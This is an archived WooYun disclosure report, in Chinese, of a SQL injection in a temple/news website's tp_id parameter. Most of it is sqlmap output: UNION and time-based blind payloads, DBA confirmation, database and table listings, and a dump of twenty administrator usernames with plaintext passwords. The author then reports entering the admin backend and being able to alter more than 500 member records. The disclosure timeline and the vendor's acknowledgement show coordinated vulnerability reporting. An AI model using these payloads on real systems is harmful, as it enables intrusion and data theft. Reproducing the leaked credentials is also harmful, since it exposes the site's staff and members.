乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2016-01-20: 细节已通知厂商并且等待厂商处理中 2016-01-22: 厂商已经确认,细节仅向厂商公开 2016-02-01: 细节向核心白帽子及相关领域专家公开 2016-02-11: 细节向普通白帽子公开 2016-02-21: 细节向实习白帽子公开 2016-03-05: 细节向公众公开
求个首页
注入点:
http://**.**.**.**/temple/intro_t_photob.php?tp_id=138&p=4
参数tp_id 和刚刚的是不是很像,不要看错了哦
Place: GETParameter: tp_id Type: UNION query Title: MySQL UNION query (NULL) - 7 columns Payload: tp_id=-1838 UNION SELECT NULL, NULL, NULL, NUL(0x3a756f703a,0x57564e48555167476342,0x3a7369613a)#&p=4 Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: tp_id=138 AND SLEEP(5)&p=4---[17:22:43] [INFO] the back-end DBMS is MySQLweb server operating system: Windows 2008web application technology: ASP.NET, Microsoft IIS 7.5, PHPback-end DBMS: MySQL 5.0.11[17:22:43] [INFO] fetching current usercurrent user: 'www@localhost'
[17:24:53] [INFO] the back-end DBMS is MySQLweb server operating system: Windows 2008web application technology: ASP.NET, Microsoft IIS 7.5, PHP 5.3.17back-end DBMS: MySQL 5.0.11[17:24:53] [INFO] testing if current user is DBA[17:24:53] [INFO] fetching current usercurrent user is DBA: 'True'
available databases [6]:[*] information_schema[*] mysql[*] nightnews[*] performance_schema[*] test[*] www
Database: www[42 tables]+--------------------+| ad || admin || article || car_article || car_experience || car_factory || car_forum || car_newcar || car_re_forum || car_re_sh || car_sales_rank || car_second_hand || car_type || catalog || customer || dong_lin || epaper_log || forum_posts || forum_topics || headline || information || maillist || member_data || nalog3_config_idn || nalog3_counter_idn || nalog3_data || nalog3_dlog_idn || nalog3_log_idn || nalog3_now_idn || nalog3_os || retrospect_cata || retrospect_pic || temple || temple_deities || temple_forum || temple_knowledge || temple_news || temple_pic || temple_re_forum || vote || vote_data || wp_tmp |+--------------------+
20位管理员明文密码
[20 entries]+----------------+---------------------+---------+---------+--------------+| auth | lastlogin | mcatid | mid | pwd |+----------------+---------------------+---------+---------+--------------+| chief editor | 2000-00-00 00:00:00 | 1 | bob | 123456 || general editor | 2012-10-23 13:23:16 | <blank> | andy | 123456 || chief editor | 2012-10-23 17:50:24 | 1 | ah | 12345 || editor | 2005-07-16 00:55:47 | 1 | ai | 1234 || chief editor | 2010-09-20 17:18:24 | 4 | df | 1234 || chief editor | 2011-03-22 10:50:02 | 4 | dg | 12345 || editor | 2008-07-12 09:35:23 | 4 | ea | 1234 || chief editor | 2012-10-08 15:18:40 | 5 | ihh | 1234 || editor | 2012-07-03 10:38:18 | 2 | linda | 123456 || chief editor | 2012-10-22 20:47:09 | 1 | abcd | 12345 || chief editor | 2007-09-07 18:34:32 | 5 | ccl | 2086 || editor | 2012-10-08 15:17:52 | 4 | ei | 1234 || chief editor | 2012-06-26 17:09:25 | 1 | gina | 1234 || chief editor | 2012-10-24 10:12:30 | 3 | kofang | 1234 || chief editor | 2011-06-26 15:58:56 | 1 | askw | 12345 || general editor | 2012-10-24 11:27:17 | <blank> | charles | 513789 || chief editor | 2009-07-14 22:56:34 | 1 | guisin | 1234 || chief editor | 2012-10-24 12:14:02 | 2 | joanne | 12345 || general editor | 2012-10-24 14:23:06 | 4 | sarlin | cw5898cl0178 || chief editor | 2012-10-23 22:24:06 | 2 | cheng | 123456 |+----------------+---------------------+---------+---------+--------------+
就用ai来测试入后台
http://**.**.**.**/admin/edit.php
来看会员数据,每页20位。总共26页。500多会员
可以随便修改资料 密码
危害等级:高
漏洞Rank:17
确认时间:2016-01-22 01:15
感謝通報
暂无
![AI17A6$}X1$~]$8R09K2R}S.png](http://wimg.zone.ci/upload/201601/19173236d9a221656b97307e9e75552282675d7b.png)
